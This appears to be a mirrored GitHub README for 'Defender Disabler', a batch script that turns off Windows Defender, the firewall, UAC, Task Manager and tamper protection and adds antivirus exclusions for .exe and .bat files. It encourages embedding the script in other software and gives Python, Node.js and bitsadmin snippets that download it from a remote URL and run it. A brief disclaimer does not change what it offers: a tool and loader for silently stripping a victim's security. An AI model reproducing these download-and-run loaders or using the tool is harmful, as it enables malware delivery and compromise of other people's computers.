Defender Disabler Save Abandoned

a simple but destructive batch script that will disable windows defender, task manager, registerytools, cmd, bypass tamper protection and alot more

Project README

Defender Disabler ➰

Destroy Windows Defender so hard that it doesn't even know it exists anymore

Defender-disabler was made by

Love ❌ code ✅


? 〢 Content

? 〢 Features

> Disables Windows Defender completely
> Disables Automatic Sample Submission and Quickscan
> Disables Windows FireWall, Smart Screen, and other security features
> Disables important security settings such as Real-time and Ransomware protection, AntiSpyware, BehaviorMonitoring,  etc..
> Adds .exe and .bat files as exclusions and the startup folder as exclusions
> Disables UAC (Reboot Required)
> Disables TaskManager, Registrytools, cmd, run
> + Loads More!


? 〢 Using defender-disabler

First off you need to figure out if you want to use this program alone or use it in some other software that downloads and runs it.

  1. Compiling the program There are multiple ways of compiling a batch file,

  2. Implementing it in your software Depending on what language you're using, it will require different ways of implementing it.

    Here are some examples:

import requests, os
_file = requests.get('https://raw.githubusercontent.com/Rdimo/Defender-disabler/main/disabler.bat')

with open('demo.bat', 'w') as f:
    f.write(_file.text)

os.startfile('demo.bat')
const { exec } = require('child_process');
const fs = require('fs');
const axios = require('axios');

axios.get('https://raw.githubusercontent.com/Rdimo/Defender-disabler/main/disabler.bat', {
    responseType: 'text',
  }).then((response) => {
    fs.writeFileSync('demo.bat', response.data, { flag: 'a' }, (err) => {});
  });
exec('demo.bat');
bitsadmin /transfer Packages /download /priority foreground https://raw.githubusercontent.com/Rdimo/Defender-disabler/main/disabler.bat "demo.bat"
start demo.bat

❕ 〢 Warning

Running this program will completely disable Windows Defender. This program was not made to be used for any malicious purposes. If you now accidently ran this program on your main pc instead of a vm, reverting the changes will be hard but most of them can be fixed by runnig enabler.bat as admin

? 〢 Inspiration/Credits

Most of the code is taken from swagkarna and his Defender-disabler This one is just more smoother, improved, more user friendly and has more features.


By using Defender Disabler, you agree that you hold responsibility and accountability of any consequences caused by your actions
Back to Top

Open Source Agenda is not affiliated with "Defender Disabler" Project. README Source: Rdimo/Defender-disabler

Open Source Agenda Badge

Open Source Agenda Rating